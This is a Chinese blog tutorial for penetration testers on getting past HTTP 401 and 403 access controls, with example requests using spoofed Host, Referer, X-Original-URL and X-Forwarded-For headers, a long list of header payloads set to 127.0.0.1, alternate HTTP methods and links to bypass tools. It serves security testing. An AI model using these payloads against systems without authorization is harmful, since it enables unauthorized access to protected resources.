403 & 401 Bypasses

已于 2024-10-11 20:20:51 修改
阅读量1k 收藏 12
点赞数 27
文章标签: web安全 安全 网络安全
于 2024-10-11 20:20:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Timeless_cz/article/details/142862460
版权

1.前言

在我们做渗透测试或者攻防演练的时候,绕过HTTP状态码401(未授权)403(禁止访问)的目的是为了绕过访问控制或权限限制,从而获取本不应有的访问权限,继续深入测试目标系统的其他部分。

1.1. 401未授权(Unauthorized)

  • 目的:401状态码意味着用户没有提供正确的认证凭证(如用户名和密码),因此无法访问资源。在渗透测试中,绕过401错误可以帮助渗透测试人员进入被保护的区域,模拟实际攻击者的行为,以验证系统的身份验证机制是否存在漏洞。
  • 原因
    • 测试认证漏洞:检查系统的认证机制是否存在漏洞,例如是否存在弱认证、默认凭证或漏洞利用的可能性(如暴力破解或会话劫持)。
    • 验证认证绕过:通过测试是否能够绕过身份验证机制,尤其是针对某些应用错误配置(如Cookie篡改、JWT漏洞等)或利用凭证重放攻击。

1.2. 403禁止访问(Forbidden)

  • 目的:403状态码表明服务器理解请求但拒绝提供资源,通常是因为权限问题。绕过403错误可以帮助渗透测试人员检测访问控制的强度,寻找越权访问漏洞(Privilege Escalation)。
  • 原因
    • 测试访问控制:验证应用是否正确实施了访问控制机制,检查用户权限划分是否到位。若存在垂直权限提升漏洞(如低权限用户能够访问管理员资源),则可能被恶意利用。
    • 验证路径或方法绕过:403错误可能是由于路径或HTTP方法限制(如GET/POST)。测试时可以通过改变路径、编码方式或使用不同HTTP方法来尝试绕过此限制。

为什么需要绕过

  1. 全面性测试:渗透测试的目标是模拟攻击者的行为,发现系统中的安全漏洞和弱点。绕过这些状态码能够更深入地探测系统的漏洞。
  2. 暴露潜在风险:通过绕过访问控制机制,测试人员可以暴露出系统的真实安全性,帮助开发人员改进认证和授权机制,从而防止未经授权的访问。
  3. 验证安全控制的有效性:如果能够成功绕过401或403状态码,说明系统的认证和授权机制可能存在配置问题、逻辑错误或实现漏洞。

2.绕过方法

2.1. 使用工具绕过

https://github.com/iamj0ker/bypass-403

https://github.com/channyein1337/403-bypass/blob/main/403-bypass.py

https://github.com/nico989/B1pass3r

https://github.com/Dheerajmadhukar/4-ZERO-3

https://github.com/carlospolop/fuzzhttpbypass

https://github.com/devploit/dontgo403

2.2. 使用模糊测试或者爆破目录

使用dirsearch,dirb,御剑等工具进行扫目录,扫文件的方式来进行绕过,扫描的时候要打开探测403,因为有些网站的目录没有权限访问会显示403,但是在这个目录下面的文件,我们或许能扫描到并访问。

2.3. waybachurl 绕过

https://web.archive.org/

2.4. 修改HOST

Host在请求头中的作用在一般情况下,几个网站可能会部署在同一个服务器上,或者几个 web 系统共享一个服务器,通过host头来指定应该由哪个网站或者web系统来处理用户的请求。

而很多WEB应用通过获取HTTP HOST头来获得当前请求访问的位置,但是很多开发人员并未意识到HTTP HOST头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。

修改客户端请求头中的 Host 可以通过修改 Host 值修改为子域名或者ip来绕过来进行绕过二级域名;

首先对该目标域名进行子域名收集,整理好子域名资产(host字段同样支持IP地址)。

先Fuzz测试跑一遍收集到的子域名,这里使用的是Burp的Intruder功能。若看到一个服务端返回200的状态码,即表面成功找到一个在HOST白名单中的子域名。我们利用firefox插件来修改HOST值,成功绕过访问限制。

2.5.覆盖请求 URL

尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。

通过支持 X-Original-URL 和 X-Rewrite-URL 标头,用户可以使用 X-Original-URL 或 X-Rewrite-URL HTTP 请求标头覆盖请求 URL 中的路径,尝试绕过对更高级别的缓存和 Web 服务器的限制

RequestGET /auth/login HTTP/1.1ResponseHTTP/1.1 403 Forbidden

ReqeustGET / HTTP/1.1X-Original-URL: /auth/loginResponseHTTP/1.1 200 OK

or:

ReqeustGET / HTTP/1.1X-Rewrite-URL: /auth/loginResponseHTTP/1.1 200 OK

2.6.Referer 标头绕过

尝试使用 Referer 标头绕过 Web 服务器的限制。

介绍:Referer 请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用 Referer 请求头识别访问来源。

RequestGET /auth/login HTTP/1.1Host: xxxResponseHTTP/1.1 403 Forbidden

ReqeustGET / HTTP/1.1Host: xxxReFerer:https://xxx/auth/loginResponseHTTP/1.1 200 OK

or

ReqeustGET /auth/login HTTP/1.1Host: xxxReFerer:https://xxx/auth/loginResponseHTTP/1.1 200 OK

2.7.代理 IP

一般开发者会通过 Nginx 代理识别访问端 IP 限制对接口的访问,尝试使用 X-Forwarded-For、X-Forwared-Host 等标头绕过 Web 服务器的限制。

X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Client-IP: 127.0.0.1X-Forwarded-For: 127.0.0.1X-Forwared-Host: 127.0.0.1X-Host: 127.0.0.1X-Custom-IP-Authorization: 127.0.0.1

如:

RequestGET /auth/login HTTP/1.1ResponseHTTP/1.1 401 Unauthorized

ReqeustGET /auth/login HTTP/1.1X-Custom-IP-Authorization: 127.0.0.1ResponseHTTP/1.1 200 OK

2.8.扫描

遇到 403 了,上目录扫描工具,扫目录,扫文件(记住,扫描的时候要打开探测403,因为有些网站的目录

没有权限访问会显示403,但是在这个目录下面的文件,我们或许能扫描到并访问 )

2.9.通过标头payload绕过

Base-Url: 127.0.0.1

Client-IP: 127.0.0.1

Http-Url: 127.0.0.1

Proxy-Host: 127.0.0.1

Proxy-Url: 127.0.0.1

Real-Ip: 127.0.0.1

Redirect: 127.0.0.1

Referer: 127.0.0.1

Referrer: 127.0.0.1

Refferer: 127.0.0.1

Request-Uri: 127.0.0.1

Uri: 127.0.0.1

Url: 127.0.0.1

X-Client-IP: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

X-Forward-For: 127.0.0.1

X-Forwarded-By: 127.0.0.1

X-Forwarded-For-Original: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Forwarded-Host: 127.0.0.1

X-Forwarded-Port: 443

X-Forwarded-Port: 4443

X-Forwarded-Port: 80

X-Forwarded-Port: 8080

X-Forwarded-Port: 8443

X-Forwarded-Scheme: http

X-Forwarded-Scheme: https

X-Forwarded-Server: 127.0.0.1

X-Forwarded: 127.0.0.1

X-Forwarder-For: 127.0.0.1

X-Host: 127.0.0.1

X-Http-Destinationurl: 127.0.0.1

X-Http-Host-Override: 127.0.0.1

X-Original-Remote-Addr: 127.0.0.1

X-Original-Url: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Proxy-Url: 127.0.0.1

X-Real-Ip: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Rewrite-Url: 127.0.0.1

X-True-IP: 127.0.0.1

2.10.使用其他请求方法

GET
HEAD
POST
PUT
CONNECT
COPY
DELETE
LABEL
LOCK
MOVE
OPTIONS
PATCH
POUET
TRACE
TRACK
UNCHECKOUT
UPDATE
VERSION-CONTROL

记得点赞+关注,关注微信公众号菜鸟学渗透或者www.cnxst.vip,获取最新文章,有任何问题可以后台私信我

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

绕过HTTP401403响应限制工具
墨痕诉清风的博客
06-26 296
一种旨在自动化各种技术的工具,以绕过HTTP 401403响应代码并访问系统中未授权的区域。此代码是为安全爱好者和专业人士只。使用它在您自己的风险。
Webgoat--Authentication Bypasses
hee_mee的博客
06-13 1286
ZeroNil
远程服务器返回错误: (401)未经授权的解决办法
王鹤霖的专栏 三人行必有我师
06-05 8935
1、错误号401.1 症状:HTTP 错误 401.1 - 未经授权:访问由于凭据无效被拒绝。 分析: 由于用户匿名访问使用的账号(默认是IUSR_机器名)被禁用,或者没有权限访问计算机,将造成用户无法访问。 解决方案: (1)查看IIS管理器中站点安全设置的匿名帐户是否被禁用,如果是,请尝试用以下办法启用: 控制面板->管理工具->计算机管理->本地用户和组,将IUSR_机器名账号启用。如果还没有解决,请继续下一步。 (2)查看本地安全策略中,IIS管理器中站点的默认匿名访
403&401Bypass绕过
Caideyib的博客
11-09 642
修改Host值,如果网站做了基于域名或则和ip地址的访问控制策略限制一些敏感资源的访问,可以通过修改host值(比如通过信息收集到的子域,或者是目标的其他资产ip或者是内网 ip)都可以进行尝试从而绕过访问控制策略。403也有可能是waf导致,waf中配置了禁止访问的文件名或者路径,此时可以尝试通过填充脏数据,大小写,双重URL编码或者fuzz路径来尝试bypass。如果网页不是直接从原始服务器获取,而是通过代理服务器中转或代理传输的,代理服务器可以限制你访问私有信息,对一些敏感请求进行拦截。
渗透测试-渗透中403/401页面绕过的思路总结
lza20001103的博客
08-29 5660
渗透中403/401页面绕过的思路总结 文章目录渗透中403/401页面绕过的思路总结0x01 前言0x02 利用姿势1.端口利用2.修改HOST3.覆盖请求URL4.Referer标头绕过5.代理IP6.扩展名绕过7.扫描的时候8.最后补充再一些401403 bypass的tips 0x01 前言 做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结! 0x02 利用姿势 1.端口利用 扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。 2
403页面绕过
qq_63980959的博客
02-29 2468
拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web服务的8001端口,我们尝试使用8001端口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001端口,客户貌似认为这个很简单,关闭8001端口,下线业务后,让我们继续尝试后台能
BypassSuper:绕过403401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
4-ZERO-3:403401绕过方法+ Bash自动化+您的支持;)
03-04
介绍 4-ZERO-3工具绕过403/401。 该脚本包含执行此操作的所有可能技术。 注意:如果看到多个[200 Ok] /旁路作为输出,则必须检查Content-Length。 如果多次(200 OK)/旁路的内容长度相同,则表示误报。 原因可能是“ 301/302”或“ ../”。[有效负载]不要紧迫。 用法 root@me_dheeraj:$ bash 403-bypass.sh https://target.com/secret 先决条件 apt安装curl [Debian]
KNOX_Kernel_Mitigation_Bypasses_(New_Reliable_Android_Kernel_
08-29
【KNOX Kernel Mitigation Bypasses - New Reliable Android Kernel Root Exploitation Part #2】 在信息安全领域,尤其是针对移动设备的安全,KNOX Kernel Mitigation Bypasses 是一个重要的研究话题。这部分内容...
信息安全_数据安全_EDR Internals and Bypasses.pdf
08-21
本文档探讨了端点检测与响应(EDR)技术的内部机制以及如何绕过它们。EDR是信息安全领域的一个重要组成部分,特别强调在现代威胁环境中对数据安全的保护。 首先,文档介绍了EDR的基本概念和能力。...
CVE-2020-15148-bypasses:几条关于CVE-2020-15148(yii2反序列化)的绕过
03-09
CVE-2020-15148绕过 几条关于CVE-2020-15148(yii2反序列化)的绕过 poc1 这一个是在2.0.37版本可利用的,2.0.38恢复了这,也就是这个被分配了CVE-2020-15148,后面的三个是绕过 <?...namespace yii\rest{ ...
python训练Faster RCNN&&C++调用训练好的模型进行物体检测-基于opencv3.4.3(超详细)
qq_29462849的博客
12-28 9800
介绍 上一篇博文讲到tensorflow Object Detection api 基于SSD模型对数据进行训练,然后通过C++版本的opencv进行调用,但是通过实验发现,SSD虽然快但是准确率实在太低了,所以又重新使用Faster RCNN进行重新训练~废话不多说了,开始主要内容介绍了! 训练阶段 配置:GTX1060、I7-8700k~ 关于object detection api的配置使用...
burp爆破401基础认证
课嗨教育的专栏
04-05 2934
目录 0x01 废话 0x02 基础认证介绍 0x03 burp爆破 0x01 废话 很多小伙伴不知道怎么使用burpsuite对基础认证进行报错,这次工作中遇到了,本来没有啥好写的,但是想想还是写下过程吧。 0x02 基础认证介绍 401错误代表用户没有访问权限,需要进行身份认证。比如tomcat的manager平台的登录验证就是401认证: 基础认证的数据包跟往常的POST和GET的包认证方式有那么一丢丢差距,他的请求包是像下面这样的格式: GET /manager/html H
HTTP报错401403详解及解决办法
ning6258的博客
02-18 2575
一、401: HTTP 401 错误 - 未授权: (Unauthorized) 您的Web服务器认为,客户端发送的 HTTP 数据流是正确的,但进入网址 (URL) 资源 , 需要用户身份验证 , 而相关信息 1 )尚未被提供, 或 2 )已提供但没有通过授权测试。这就是通常所知的“ HTTP 基本验证 ”。 需客户端提供的验证请求在 HTTP 协议中被定义为 WWW – 验证标头字段 (W...
401/403绕过
最新发布
qq_55202378的博客
08-22 326
一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用。服务端一般使用Referer请求头识别访问来源。请求头包含了当前请求页面的来源页面的地址,基于扩展名,用于绕过403受限制的目录。等标头绕过Web服务器的限制。标头绕过Web服务器的限制。
HTTP 401 错误 - 未授权 终极解决办法
weixin_43018043的博客
08-20 9万+
401最根本就是用户权限未授予导致的代码无执行权限而失效或出错; 一句话就是赋权! 但是赋权又面临着可能的安全问题; 在正常代码下突然出现的401那就不是赋权可以解决了,或者说再重复赋权可以正常的,但是每执行一次都需要重复赋权一次肯定就是大问题了; 401.1 未经授权:访问由于凭据无效被拒绝。 401.2 未经授权: 访问由于服务器配置倾向使用替代身份验证方法而被拒绝。 401.3 ...
HTTP 错误 401.0 - Unauthorized 的解决方案
热门推荐
走错路的程序员
02-10 20万+
我的项目突然间报这个错误.... HTTP 错误 401.0 - Unauthorized 您无权查看此目录或页面。 最可能的原因: 通过身份验证的用户无权访问处理请求所需的资源。 可尝试的操作: 查看失败请求跟踪日志以获取有关此错误的其他信息。有关详细信息,请单击此处。 详细错误信息: 模块
server.cpp:35:13: error: cannot jump from switch statement to this case label server.cpp:33:17: note: jump bypasses variable initialization
06-10
这个错误是因为在 switch 语句中使用了 `goto` 或者 `break` 等跳转语句,跳过了变量的初始化语句,导致编译器无法确定变量的值。这是不允许的,因为变量必须在使用之前进行初始化。 为了解决这个错误,你需要将变量的初始化语句移到 switch 语句之前或者将跳转语句移到变量初始化语句之后。例如: ``` int x; // 变量必须在使用之前进行初始化 switch (enumValue) { case EnumValue1: x = 1; // do something break; case EnumValue2: x = 2; // do something break; default: x = 0; // Handle the unhandled enumeration values break; } // 使用变量 x ``` 这样就可以避免这个错误了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值